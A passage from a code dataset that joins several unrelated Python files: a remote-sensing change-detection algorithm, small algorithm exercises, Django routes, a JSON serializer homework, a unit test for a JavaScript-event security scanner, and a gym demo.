2858–2874, 2014.\n\"\"\"\n\nimport numpy as np\nfrom scipy.linalg import eig\nfrom scipy.stats import chi2\nfrom sklearn.cluster import KMeans\n\nfrom Methodology.util.cluster_util import otsu\nimport gdal\nimport time\nimport imageio\n\n\nclass ISFA(object):\n def __init__(self, img_X, img_Y, data_format='CHW'):\n \"\"\"\n the init function\n :param img_X: former temporal image, its dim is (band_count, width, height)\n :param img_Y: latter temporal image, its dim is (band_count, width, height)\n \"\"\"\n if data_format == 'HWC':\n self.img_X = np.transpose(img_X, [2, 0, 1])\n self.img_Y = np.transpose(img_Y, [2, 0, 1])\n else:\n self.img_X = img_X\n self.img_Y = img_Y\n\n channel, height, width = self.img_X.shape\n self.L = np.zeros((channel - 2, channel)) # (C-2, C)\n for i in range(channel - 2):\n self.L[i, i] = 1\n self.L[i, i + 1] = -2\n self.L[i, i + 2] = 1\n self.Omega = np.dot(self.L.T, self.L) # (C, C)\n self.norm_method = ['LSR', 'NR', 'OR']\n\n def isfa(self, max_iter=30, epsilon=1e-6, norm_trans=False, regular=False):\n \"\"\"\n extract change and unchange info of temporal images based on USFA\n if max_iter == 1, ISFA is equal to SFA\n :param max_iter: the maximum count of iteration\n :param epsilon: convergence threshold\n :param norm_trans: whether normalize the transformation matrix\n :return:\n ISFA_variable: ISFA variable, its dim is (band_count, width * height)\n lamb: last lambda\n all_lambda: all lambda in convergence process\n trans_mat: transformation matrix\n T: last IWD, if max_iter == 1, T is chi-square distance\n weight: the unchanged probability of each pixel\n \"\"\"\n\n bands_count, img_height, img_width = self.img_X.shape\n P = img_height * img_width\n # row-major order after reshape\n img_X = np.reshape(self.img_X, (-1, img_height * img_width)) # (band, width * height)\n img_Y = np.reshape(self.img_Y, (-1, img_height * img_width)) # (band, width * height)\n lamb = 100 * np.ones((bands_count, 1))\n all_lambda = []\n weight = np.ones((img_width, img_height)) # (1, width * height)\n # weight[302:343, 471] = 1 # init seed\n # weight[209, 231:250] = 1\n # weight[335:362, 570] = 1\n # weight[779, 332:387] = 1\n\n weight = np.reshape(weight, (-1, img_width * img_height))\n for _iter in range(max_iter):\n sum_w = np.sum(weight)\n mean_X = np.sum(weight * img_X, axis=1, keepdims=True) / np.sum(weight) # (band, 1)\n mean_Y = np.sum(weight * img_Y, axis=1, keepdims=True) / np.sum(weight) # (band, 1)\n center_X = (img_X - mean_X)\n center_Y = (img_Y - mean_Y)\n\n # cov_XY = covw(center_X, center_Y, weight) # (2 * band, 2 * band)\n # cov_X = cov_XY[0:bands_count, 0:bands_count]\n # cov_Y = cov_XY[bands_count:2 * bands_count, bands_count:2 * bands_count]\n var_X = np.sum(weight * np.power(center_X, 2), axis=1, keepdims=True) / ((P - 1) * sum_w / P)\n var_Y = np.sum(weight * np.power(center_Y, 2), axis=1, keepdims=True) / ((P - 1) * sum_w / P)\n std_X = np.reshape(np.sqrt(var_X), (bands_count, 1))\n std_Y = np.reshape(np.sqrt(var_Y), (bands_count, 1))\n\n # normalize image\n norm_X = center_X / std_X\n norm_Y = center_Y / std_Y\n diff_img = (norm_X - norm_Y)\n mat_A = np.dot(weight * diff_img, diff_img.T) / ((P - 1) * sum_w / P)\n mat_B = (np.dot(weight * norm_X, norm_X.T) +\n np.dot(weight * norm_Y, norm_Y.T)) / (2 * (P - 1) * sum_w / P)\n if regular:\n penalty = np.trace(mat_B) / np.trace(self.Omega)\n mat_B += penalty * self.Omega\n # solve generalized eigenvalue problem and get eigenvalues and eigenvector\n eigenvalue, eigenvector = eig(mat_A, mat_B)\n eigenvalue = 
eigenvalue.real # discard imaginary part\n idx = eigenvalue.argsort()\n eigenvalue = eigenvalue[idx]\n\n # make sure the max absolute value of vector is 1,\n # and the final result will be more closer to the matlab result\n aux = np.reshape(np.abs(eigenvector).max(axis=0), (1, bands_count))\n eigenvector = eigenvector / aux\n\n # print sqrt(lambda)\n if (_iter + 1) == 1:\n print('sqrt lambda:')\n print(np.sqrt(eigenvalue))\n\n eigenvalue = np.reshape(eigenvalue, (bands_count, 1)) # (band, 1)\n threshold = np.max(np.abs(np.sqrt(lamb) - np.sqrt(eigenvalue)))\n # if sqrt(lambda) converge\n if threshold < epsilon:\n break\n lamb = eigenvalue\n all_lambda = lamb if (_iter + 1) == 1 else np.concatenate((all_lambda, lamb), axis=1)\n # the order of the slowest features is determined by the order of the eigenvalues\n trans_mat = eigenvector[:, idx]\n # satisfy the constraints(3)\n if norm_trans:\n output_signal_std = 1 / np.sqrt(np.diag(np.dot(trans_mat.T, np.dot(mat_B, trans_mat))))\n trans_mat = output_signal_std * trans_mat\n ISFA_variable = np.dot(trans_mat.T, norm_X) - np.dot(trans_mat.T, norm_Y)\n\n if (_iter + 1) == 1:\n T = np.sum(np.square(ISFA_variable) / np.sqrt(lamb), axis=0, keepdims=True) # chi square\n else:\n T = np.sum(np.square(ISFA_variable) / np.sqrt(lamb), axis=0, keepdims=True) # IWD\n weight = 1 - chi2.cdf(T, bands_count)\n\n if (_iter + 1) == max_iter:\n print('the lambda may not be converged')\n else:\n print('the lambda is converged, the iteration is %d' % (_iter + 1))\n\n return ISFA_variable, lamb, all_lambda, trans_mat, T, weight\n\n\ndef main():\n data_set_X = gdal.Open('../../../Dataset/Landsat/Taizhou/2000TM') # data set X\n data_set_Y = gdal.Open('../../../Dataset/Landsat/Taizhou/2003TM') # data set Y\n\n img_width = data_set_X.RasterXSize # image width\n img_height = data_set_X.RasterYSize # image height\n\n img_X = data_set_X.ReadAsArray(0, 0, img_width, img_height)\n img_Y = data_set_Y.ReadAsArray(0, 0, img_width, img_height)\n\n channel, img_height, img_width = img_X.shape\n tic = time.time()\n sfa = ISFA(img_X, img_Y)\n # when max_iter is set to 1, ISFA becomes SFA\n bn_SFA_variable, bn_lamb, bn_all_lambda, bn_trans_mat, bn_iwd, bn_isfa_w = sfa.isfa(max_iter=50, epsilon=1e-3,\n norm_trans=True)\n sqrt_chi2 = np.sqrt(bn_iwd)\n bcm = np.ones((1, img_height * img_width))\n thre = otsu(sqrt_chi2)\n bcm[sqrt_chi2 > thre] = 255\n bcm = np.reshape(bcm, (img_height, img_width))\n imageio.imwrite('ISFA_Taizhou.png', bcm)\n toc = time.time()\n print(toc - tic)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ChenHongruixuan/ChangeDetectionRepository","sub_path":"Methodology/Traditional/SFA/isfa.py","file_name":"isfa.py","file_ext":"py","file_size_in_byte":7352,"program_lang":"python","lang":"en","doc_type":"code","stars":421,"dataset":"github-code","pt":"32"} +{"seq_id":"4695054143","text":"\"\"\"G. Закручивающаяся спираль\nВолшебная фея отправила Гоше послание. Чтобы никто не смог перехватить сообщение,\nфея его закодировала. 
Послание записано в матрице по спирали,\nначиная с левого верхнего угла вправо.\nПомогите Гоше прочитать сообщение.\n\"\"\"\nwith open(\"input.txt\") as f:\n n = int(f.readline())\n m = int(f.readline())\n matrix = []\n for i in range(n):\n matrix.append(f.readline().split())\nA = 1\ni, j = 0, 0\nN = n * m\n\nfor p in range(m//2+1):\n for right in range(p, m-1-p):\n if A > N:\n break\n else:\n print(matrix[i][j], end=\" \")\n A += 1\n j += 1\n for down in range(p, n-1-p):\n if A > N:\n break\n else:\n print(matrix[i][j], end=\" \")\n A += 1\n i += 1\n for left in range(p, m-1-p):\n if A > N:\n break\n else:\n print(matrix[i][j], end=\" \")\n A += 1\n j -= 1\n for up in range(p, n-1-p):\n if A > N:\n break\n else:\n print(matrix[i][j], end=\" \")\n A += 1\n i -= 1\n i += 1\n j += 1\n\nif m == n and m%2==1:\n print(matrix[m//2][n//2])\n\n\"\"\"\ndef spiralOrder(matrix):\n result = []\n while matrix:\n result.extend(matrix.pop(0))\n matrix = list(zip(*matrix))[::-1]\n return result\nmatrix = [\n [1, 2, 3, 4],\n [12, 13, 14, 5],\n [11, 16, 15, 6],\n [10, 9, 8, 7],\n]\nprint(\" \".join(str(x) for x in spiralOrder(matrix)))\n\"\"\"","repo_name":"koxximus/algoritms","sub_path":"g3.py","file_name":"g3.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71341543131","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom captcha.views import *\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'cat.views.index', name='home'),\n url(r'^captcha/', 'captcha.views.image', name='image'),\n url(r'^populate/', 'captcha.views.populate', name='populate'),\n url(r'^export/', 'captcha.views.results', name='results'),\n\n\n \t\n]\n","repo_name":"Lohit13/captchaanalysis","sub_path":"cat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31635011404","text":"import unittest\nfrom unittest.mock import Mock\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse, parse_qs\nfrom userControlledJavascriptEvent import UserControlledJavascriptEventScanRule\n\n\nclass UserControlledJavascriptEventScanRuleTest(unittest.TestCase):\n def setUp(self):\n self.scanner = UserControlledJavascriptEventScanRule()\n\n def test_scan_http_response_receive(self):\n html_content = \"\"\"\n \n \n

Test HTML

\n
\n \n \n \n \n Click Me\n \n
\n \n \n \n\n \"\"\"\n\n response = Mock()\n response.status_code = 200\n response.headers = {\"Content-Type\": \"text/html\"}\n response.content = html_content.encode(\"utf-8\")\n response.url = \"https://example.com/?username=test&password=123\"\n\n parsed_url = urlparse(response.url)\n query_params = parse_qs(parsed_url.query)\n\n soup = BeautifulSoup(html_content, \"html.parser\")\n # self.scanner.scan_http_response_receive(response, soup)\n # print(self.scanner.scan_http_response_receive(response, soup))\n print(self.scanner.scan_http_response_receive(response, soup))\n self.assertEqual(self.scanner.scan_http_response_receive(response, soup),\n \"CWE-200: Improper Input Validation\")\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"macsta31/reverse_engineering_api","sub_path":"api/tools/userControlledJavascriptEvent/userControlledJavScriptEventScanTest.py","file_name":"userControlledJavScriptEventScanTest.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19818072572","text":"import json\n\n\n# check the type of data in list or dict\ndef def_type(value):\n type = None\n if isinstance(value, int):\n type = 'int'\n elif isinstance(value, float):\n type = 'float'\n elif isinstance(value, str):\n type = 'str'\n else:\n print(\"[Error]: unexpected basic data type, data = {}\".format(value))\n exit(1)\n\n return type\n\n\n# restore the data from string to original type before serialized\ndef convert_type(unit):\n if unit[1] == 'int':\n return int(unit[0])\n elif unit[1] == 'float':\n return float(unit[0])\n elif unit[1] == 'str':\n return str(unit[0])\n\n\n# serialize the data\ndef serializer(data):\n data_str = ''\n if isinstance(data, list):\n data_str = data_str + 'list' + '\\n'\n for i in range(len(data)):\n t = def_type(data[i])\n data_str = data_str + str(data[i]) + '_' + t + '\\t'\n return data_str[:-1]\n elif isinstance(data, dict):\n data_str = data_str + 'dict' + '\\n'\n keys = ''\n values = ''\n for key in data.keys():\n key_type = def_type(key)\n keys = keys + key + '_' + key_type + '\\t'\n value_type = def_type(data[key])\n values = values + str(data[key]) + '_' + value_type + '\\t'\n data_str = data_str + keys[:-1] + '\\n' + values[:-1]\n return data_str\n\n\n# deserialize data read from file\ndef deserializer(lines):\n if len(lines) == 0:\n return None\n elif lines[0] == 'list':\n data_restored = []\n if len(lines) > 1:\n lists = lines[1].split('\\t')\n for list in lists:\n data_restored.append(convert_type(list.split('_')))\n elif lines[0] == 'dict':\n data_restored = {}\n if len(lines) > 1:\n keys = lines[1].split('\\t')\n values = lines[2].split('\\t')\n keys_restored = []\n values_restored = []\n for key in keys:\n keys_restored.append(convert_type(key.split('_')))\n for value in values:\n values_restored.append(convert_type(value.split('_')))\n data_restored = dict(zip(keys_restored, values_restored))\n return data_restored\n\n\n# compare if 2 data structure are the same\ndef my_compare(ds1, ds2):\n if type(ds1) != type(ds2):\n return False\n\n if len(ds1) != len(ds2):\n return False\n if isinstance(ds1, list):\n for i in range(len(ds1)):\n if ds1[i] != ds2[i] or type(ds1[i]) != type(ds2[i]):\n return False\n if isinstance(ds1, dict):\n for key in ds1.keys():\n if key not in ds2.keys():\n return False\n if ds1[key] != ds2[key] or type(ds1[key]) != type(ds2[key]):\n return False\n\n return True\n\n\ndef getFileLines(fname):\n fhandle = open(fname)\n 
lines = []\n for line in fhandle:\n line = line.rstrip()\n if line:\n lines.append(line)\n fhandle.close()\n return lines\n\n\nif __name__ == '__main__':\n json_path = input(\"Please key in path to the json file: \")\n fh = open(json_path)\n data = json.load(fh)\n fh.close()\n data_serialized = serializer(data)\n filename = input(\"Please key in file name:\")\n with open(filename, 'w') as f:\n f.write(data_serialized)\n f.close()\n\n lines = getFileLines(filename)\n data_deserialized = deserializer(lines)\n same_data = my_compare(data, data_deserialized)\n\n if same_data:\n print(\"Successful! Deserialized data {} is the same as original file.\".format(data_deserialized))\n else:\n print(\"Failed! Deserialized data {} is different from original file.\".format(data_deserialized))\n","repo_name":"jingrui0615/MH8811-G1901967D","sub_path":"05/Homework5.py","file_name":"Homework5.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12240630490","text":"import gym\nimport atari_py\n\n#env = gym.make('CartPole-v0')\nenv = gym.make('SpaceInvaders-v0')\nenv.reset()\n\nfor _ in range(1000):\n env.render()\n env.step(env.action_space.sample())\n \nenv.close()\n\nprint(atari_py.list_games())","repo_name":"baihuaxie/drl-lib","sub_path":"flow_tests/test_gym.py","file_name":"test_gym.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72889374810","text":"def sn(numList):\n global n\n n = n+1\n print (\"The number of times the function executes \", n)\n if len(numList) == 1:\n return numList[0]\n else:\n r = numList[0]\n print (\"The function takes the value of r as\", r)\n s = sn(numList[1:])# recursion step\n print (\"The value of s in this step is\", s)\n return r + s\nn = 0\nprint (sn([6,8,10,5,7]))\n","repo_name":"Bama-S/python_course_material","sub_path":"1/codes/intro/recursioneg2.py","file_name":"recursioneg2.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"17767829886","text":"#! /home/student/c/cstenkamp/miniconda/envs/derive_conceptualspaces/bin/python3\n\n#TODO be able to analyze 737922 from backup-28-02-2022. 
If that shows me the error, this code achieved it's goal.\n\nimport os\nimport argparse\nfrom os.path import join, isfile, abspath, dirname\nfrom datetime import datetime\nfrom collections import Counter\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\n\nfrom dotenv.main import load_dotenv\n\nfrom util.logfile_for import print_singlejob, load_acctfile, extract_error, read_errorfile, apply_dotenv_vars\nimport util\nfrom ikw_grid.sge_status import get_status\n\nflatten = lambda l: [item for sublist in l for item in sublist]\n\ndef parse_command_line_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('start_pid', help='ID of the first smk_runner that startet it all')\n parser.add_argument('--base_dir', '-b', help='Base-dir where the smk_runner logs are', default=os.environ[\"HOME\"])\n parser.add_argument('--include_errors', '-e', help=\"If you want the tracebacks to be shown\", default=False, action=\"store_true\")\n return parser.parse_args()\n\n########################################################################################################################\n# stuff for reading the \"smk_runner.e*\" files\n\ndef read_files(pid, base_dir):\n with open(join(base_dir, f\"smk_runner.e{pid}\")) as rfile:\n errorfile = rfile.read()\n with open(join(base_dir, f\"smk_runner.o{pid}\")) as rfile:\n outputfile = rfile.read()\n return errorfile, outputfile\n\ndef get_all_jobfiles(new_job_id, base_dir):\n errorfiles, outputfiles = [], []\n for _ in range(100):\n errorfile, outputfile = read_files(new_job_id, base_dir)\n assert outputfile.split(\"\\n\")[0] == f\"This is run nr {len(errorfiles)+1}\"\n errorfiles.append(errorfile)\n outputfiles.append(outputfile)\n if any(l.startswith(\"Your job\") and l.endswith(\"has been submitted\") for l in outputfile.split(\"\\n\")):\n line = [l for l in outputfile.split(\"\\n\") if l.startswith(\"Your job\") and l.endswith(\"has been submitted\")][0]\n new_job_id = line[len(\"Your job \"):line[len(\"Your job \"):].find(\" \") + len(\"Your job \")]\n else:\n break\n for i, err in enumerate(errorfiles):\n if \"Will exit after finishing currently running jobs.\" in err.split(\"\\n\"):\n errorfiles[i] = \"\\n\".join(err.split(\"\\n\")[:err.split(\"\\n\").index(\"Will exit after finishing currently running jobs.\")])\n return errorfiles, outputfiles\n\n\ndef split_all(errorfiles):\n todo_jobs = [\"\\n\".join(i.split(\"\\n\")[i.split(\"\\n\").index(\"Job stats:\")+1:]) for i in errorfiles]\n todo_jobs = [\"\\n\".join(i.split(\"\\n\")[:[j for j, elem in enumerate(i.split(\"\\n\")) if elem.startswith(\"total\")][0]+1]) for i in todo_jobs]\n\n job_strings = [i for i in flatten([i.split(\"\\n\")[i.split(\"\\n\").index(\"Select jobs to execute...\")+1 if \"Select jobs to execute...\" in i else None:] for i in errorfiles]) if i]\n job_strings = [i for i in job_strings if i != \"Select jobs to execute...\"]\n done_inds = [n for n, i in enumerate(job_strings) if i.startswith(\"Finished job\")]\n dones = [\"\\n\".join(job_strings[i - 1:i + 2]) for i in done_inds]\n for done in dones: job_strings = \"\\n\".join(job_strings).replace(done, \"\").split(\"\\n\")\n dones = {i.split(\"\\n\")[1][len(\"Finished job \"):-1]:datetime.strptime(i.split(\"\\n\")[0][1:-1], \"%a %b %d %H:%M:%S %Y\") for i in dones}\n job_strings = [i for i in job_strings if i]\n\n start_inds = [n for n, i in enumerate(job_strings) if i.startswith(\"rule\") and i.endswith(\":\")]\n indiv_rules = [[j.strip() for j in 
job_strings[start_inds[i]-1:start_inds[i+1]-1]] for i in range(len(start_inds)-1)]\n #TODO rather use the fact dass die Sachen zur Rule noch eingerückt sind!! also alles eingerückte nach start_inds, und dann jeweils noch die nächstmöglichen\n # reihen die mit any of [\"Will submit the following\", \"Error-File can be found at\", \"Submitted job\"] anfangen, umrühren, fertig.\n job_infos = []\n leftover_text = []\n for nrule, rule in enumerate(indiv_rules):\n usable_lines = [j.split(\": \") for j in rule[2:([n for n, j in enumerate(rule) if j.startswith(\"Will submit\") or j.startswith(\"Resuming incomplete job\")][0]) if any(i.startswith(\"Will submit\") or i.startswith(\"Resuming incomplete job\") for i in rule) else None]]\n usable_if = lambda x: len(x) == 2 and not any(j in \": \".join(x) for j in [\"failed because of an error\"])\n leftover_text.extend([\": \".join(i) for i in usable_lines if not usable_if(i)])\n job_infos.append(dict(i for i in usable_lines if usable_if(i)))\n job_infos[-1][\"rule\"] = rule[1][len(\"rule \"):-1]\n job_infos[-1][\"timestamp\"] = datetime.strptime(rule[0][1:-1], \"%a %b %d %H:%M:%S %Y\")\n\n #TODO the order of this may be messed up if eg. \"Trying to restart job\" comes before \"Removing output files of\"\n #TODO on my local terminal, the \"building dag of jobs...\" until \"select jobs to execute...\" is yellow, the rules with their IO is green, (and other stuff I can't tell)\n # - I may be able to use these colors to split what-it-belonged-to in cases where two logs were written simultaenously to the logfile!\n for other_txt in [\"Removing output files of\", \"failed because of an error!\", \"Trying to restart job\"]:\n if any(other_txt in i for i in rule):\n tmpstr = rule[[n for n, i in enumerate(rule) if other_txt in i][0]:]\n leftover_text.extend([i for i in tmpstr if not \"Submitted job\" in i])\n rule = rule[:[n for n, i in enumerate(rule) if other_txt in i][0]]+[i for i in tmpstr if \"Submitted job\" in i]\n if any(\"Error in rule\" in i for i in rule):\n tmpstr = rule[[n for n, i in enumerate(rule) if \"Error in rule\" in i][0] - 1:]\n leftover_text.extend([i for i in tmpstr if not \"Submitted job\" in i])\n rule = rule[:[n for n, i in enumerate(rule) if \"Error in rule\" in i][0]-1]+[i for i in tmpstr if \"Submitted job\" in i]\n if any(i.startswith(\"Submitted job\") for i in rule):\n if len(rule) > [i for i, elem in enumerate(rule) if elem.startswith(\"Submitted job\")][0]+1:\n leftover_text.extend(rule[[i for i, elem in enumerate(rule) if elem.startswith(\"Submitted job\")][0]+1:])\n rule = rule[:[i for i, elem in enumerate(rule) if elem.startswith(\"Submitted job\")][0]+1]\n\n\n if any(i.startswith(\"Will submit the following:\") for i in rule):\n job_infos[-1][\"submit_command\"] = [i for i in rule if i.startswith(\"Will submit the following:\")][0].split(\"`\")[1]\n job_infos[-1][\"errorfile\"] = [i for i in rule if i.startswith(\"Error-File can be found at\")][0].split(\"`\")[1]\n job_infos[-1][\"external_id\"] = rule[-1].split(\"'\")[1]\n elif any(i.startswith(\"Resuming incomplete job\") for i in rule):\n job_infos[-1][\"external_id\"] = [i for i in rule if i.startswith(\"Resuming incomplete job\")][0].split(\"'\")[1]\n job_infos[-1][\"resuming\"] = True\n else:\n print()\n pure_resumes = []\n for resumed_job in [i for i in job_infos if i.get(\"resuming\")]:\n orig_job = [i for i in job_infos if i[\"external_id\"] == resumed_job[\"external_id\"] and not i.get(\"resuming\")]\n if len(orig_job) < 1:\n 
pure_resumes.append(resumed_job[\"external_id\"])\n else:\n assert len(orig_job) == 1\n assert all(v == resumed_job[k] for k, v in orig_job[0].items() if k not in [\"resuming\", \"submit_command\", \"errorfile\", \"resources\", \"timestamp\", \"resumed_at\"])\n orig_job[0].setdefault(\"resumed_at\", []).append(resumed_job[\"timestamp\"])\n job_infos = [i for i in job_infos if (not i.get(\"resuming\") or i[\"external_id\"] in pure_resumes)]\n return todo_jobs, dones, job_infos, leftover_text\n\n\ndef merge_job_infos(job_infos):\n di = {}\n for job in job_infos:\n di.setdefault(job[\"output\"], []).append(job)\n newls = []\n for vals in di.values():\n newls.append(vals[0])\n newls[-1][\"resumed_at\"] = {newls[-1][\"external_id\"]: newls[-1][\"resumed_at\"]} if \"resumed_at\" in newls[-1] else {}\n for elem in [\"timestamp\", \"external_id\", \"submit_command\"]:\n newls[-1][elem] = [newls[-1].get(elem)]\n if len(vals) >= 2:\n for i in range(1, len(vals)):\n assert all(v == vals[i].get(k) for k, v in vals[0].items() if k not in [\"resources\", \"timestamp\", \"external_id\", \"submit_command\", \"resumed_at\", \"resuming\"])\n for elem in [\"timestamp\", \"external_id\", \"submit_command\"]:\n newls[-1][elem].append(vals[i].get(elem))\n if \"resumed_at\" in vals[i]:\n newls[-1].setdefault(\"resumed_at\", {})[vals[i][\"external_id\"]] = vals[i][\"resumed_at\"]\n return newls\n\n########################################################################################################################\n\n\ndef main():\n if isfile(os.getenv(\"MA_SELECT_ENV_FILE\", \"\")):\n load_dotenv(os.environ[\"MA_SELECT_ENV_FILE\"])\n apply_dotenv_vars()\n args = parse_command_line_args()\n errorfiles, outputfiles = get_all_jobfiles(args.start_pid, args.base_dir)\n todo_jobs, dones, job_infos, leftover_text = split_all(errorfiles) #TODO consider todo_jobs and dones!\n job_infos = merge_job_infos(job_infos)\n assert len([i[\"jobid\"] for i in job_infos]) == len(set([i[\"jobid\"] for i in job_infos]))\n for info in job_infos:\n if info[\"jobid\"] in dones.keys():\n info[\"finished_at\"] = dones[info[\"jobid\"]]\n elif not \"state\" in info:\n info[\"state\"] = {i: get_status(i, status_attempts=1, silent=True, detailed=True) for i in info[\"external_id\"]}\n # assert len([i for i in job_infos if not i.get(\"finished_at\")]) == len(job_infos)-len(dones)\n\n\n states = [{k:v for k,v in i.get(\"state\", {}).items() if v != \"unknown\"} if any(v for v in i.get(\"state\", {}).values() if v != \"unknown\") else {max(i.get(\"external_id\")): \"success\"} if i.get(\"finished_at\") else {} for i in job_infos]\n states = [(dict([max([(k, v) for k, v in i.items() if v == j], key=lambda x:x[0]) for j in set(i.values())]), dict(Counter(list(i.values())))) for i in states] #the highest ids per-state, number of states\n for state in states:\n if \"success\" in state[1] and len(state[0]) > 1:\n assert all(i > int({v: k for k, v in state[0].items()}[\"success\"]) for i in [int(k) for k,v in state[0].items() if v != \"success\"]), \"There is a succeeded task-id but it's not the last one!\"\n for single_state, infos in zip(states, job_infos):\n infos[\"single_state\"] = single_state\n\n for show in [j for j in [\"running\", \"enqueued\", \"failed\", \"success\"] if j in set(flatten([i[1].keys() for i in states]))]:\n toshow = [i for i in job_infos if show in i[\"single_state\"][0].values()]\n if toshow:\n print(\"The following runs are \"+show+\":\")\n print(\"\\n\".join([f\" {r['output'].ljust(max(len(i['output']) for i in 
toshow))} (pid {','.join(r['external_id'])})\" for r in toshow]))\n job_infos = [i for i in job_infos if not show in i[\"single_state\"][0].values()]\n\n return\n\n # if (enqueueds := [i for i in job_infos if all(j == \"enqueued\" for j in i.get(\"state\", [\"not_enqueued\"]))]):\n # print(\"The following runs are enqueued:\\n \"+\"\\n \".join([f\" {r['output'].ljust(max(len(i['output']) for i in enqueueds))} (pid {','.join(r['external_id'])})\" for r in enqueueds]))\n # job_infos = [i for i in job_infos if i[\"jobid\"] not in [i[\"jobid\"] for i in enqueueds]]\n # if (runnings := [i for i in job_infos if all(j == \"running\" for j in i.get(\"state\", [\"not_running\"]))]):\n # print(\"The following runs are running:\\n \"+\"\\n \".join([f\" {r['output'].ljust(max(len(i['output']) for i in runnings))} (pid {','.join(r['external_id'])})\" for r in runnings]))\n # job_infos = [i for i in job_infos if i[\"jobid\"] not in [i[\"jobid\"] for i in runnings]]\n # #TODO finished ones are not actually finished god damn it\n # if (dones := [i for i in job_infos if \"finished_at\" in i or all(j == \"success\" for j in i.get(\"state\"))]):\n # print(\"The following ones are finished: \\n \" + \"\\n \".join([f\"{i['output'].ljust(max(len(j['output']) for j in dones))}(pid {','.join(i['external_id'])}){(' at '+str(i['finished_at'])) if 'finished_at' in i else ''}\" for i in dones]))\n # job_infos = [i for i in job_infos if i[\"jobid\"] not in [i[\"jobid\"] for i in dones]]\n # #TODO there's also enqueued!\n # if (fails := sorted([i for i in job_infos if not i.get(\"finished_at\")], key=lambda x: x[\"output\"])):\n # interrupteds = []\n # print(\"The following ones failed:\")\n # for fail in fails:\n # if not args.include_errors:\n # print(f\" {fail['output'].ljust(max(len(i['output']) for i in fails))} (pid {','.join(fail['external_id'])})\")\n # else:\n # try:\n # err, kind = extract_error(read_errorfile(fail[\"errorfile\"]))\n # except FileNotFoundError:\n # err, kind = \"\", \"\"\n # if kind == \"Exception\":\n # print(f\" {fail['output'].ljust(max(len(i['output']) for i in fails))} (pid {','.join(fail['external_id'])})\")\n # print(\" \" + err.replace(\"\\n\", \"\\n \"))\n # elif kind.startswith(\"SystemExit\") or kind == \"Interrupted\":\n # interrupteds.append((fail, err, kind))\n # else:\n # print(f\" {fail['output'].ljust(max(len(i['output']) for i in fails))} (pid {','.join(fail['external_id'])})\")\n # print(\" \"+\"Error unknown\")\n # if interrupteds:\n # print(\"The following ones were interrupted:\")\n # for j in interrupteds:\n # print(f\" {j[0]['output'].ljust(max(len(i[0]['output']) for i in interrupteds))} (pid {','.join(j[0]['external_id'])})\")\n # #TODO cross-check with `check -j` command\n # #TODO parse the leftover_text as well, there may be more info about fails\n # #TODO use the error-files to get the respective errors of the files\n # #TODO cross-check with todo_jobs OR manually run `snakemake --dry-run --ignore-all-existing-files` to make a tree (like pstree) of which branches worked an which ones didn't\n # # see https://www.willmcgugan.com/blog/tech/post/rich-tree/\n\n\n# TODO actually use this\ndef read_allrulesfile():\n apply_dotenv_vars()\n with open(abspath(join(dirname(util.__file__), \"..\", \"..\", \"Snakefile\"))) as rfile:\n snakefile_cont = rfile.read()\n last_rule = snakefile_cont[snakefile_cont.find(\"LAST_RULE\"):].split('\"')[1]\n with open(\"all_rules.txt\", \"r\") as rfile:\n txt = rfile.read()\n todo_jobs, _, job_infos, _ = split_all([txt])\n todo_jobs = 
todo_jobs[0]\n lastrules = [i for i in job_infos if i[\"rule\"] == last_rule]\n dones = [i for i in lastrules if isfile(join(os.environ[\"MA_BASE_DIR\"], i[\"output\"]))]\n wildcards = [dict([j.split(\"=\") for j in i[\"wildcards\"].split(\", \")]) for i in dones]\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"cstenkamp/derive_conceptualspaces","sub_path":"workflow/sge/util/analyze_log.py","file_name":"analyze_log.py","file_ext":"py","file_size_in_byte":15206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26414590190","text":"import pytest\nimport os\n\ndir_list = {\n \"contents\": [\n {\n \"type\": \"directory\",\n \"name\": \"FY20\",\n \"contents\": [\n {\n \"type\": \"file\",\n \"name\": \"letterofresignation_2020_10_04.docx\"\n },\n {\n \"type\": \"file\",\n \"name\": \"letterofresignation_2020_10_31.docx\"\n }\n ]\n },\n {\n \"type\": \"file\",\n \"name\": \"README.txt\"\n }\n ]\n }\n\nother_dir_list = {\n \"contents\": [\n {\n \"type\": \"directory\",\n \"name\": \"FY21\",\n \"contents\": [\n {\n \"type\": \"file\",\n \"name\": \"dontquityet_2020_10_04.docx\"\n },\n {\n \"type\": \"file\",\n \"name\": \"dontquityet_2020_10_31.docx\"\n }\n ]\n },\n {\n \"type\": \"file\",\n \"name\": \"README.txt\"\n }\n ]\n }\n\n\n@pytest.mark.parametrize('dir_list', [dir_list, other_dir_list])\ndef test_fixture(testing_directory):\n print([f for f in os.walk(testing_directory)])","repo_name":"chrispcharlton/trufflepig","sub_path":"test/test_fixtures.py","file_name":"test_fixtures.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"15334480189","text":"\r\nfrom aiogram import Bot,Dispatcher,executor,types\r\nfrom aiogram.types import ReplyKeyboardMarkup, 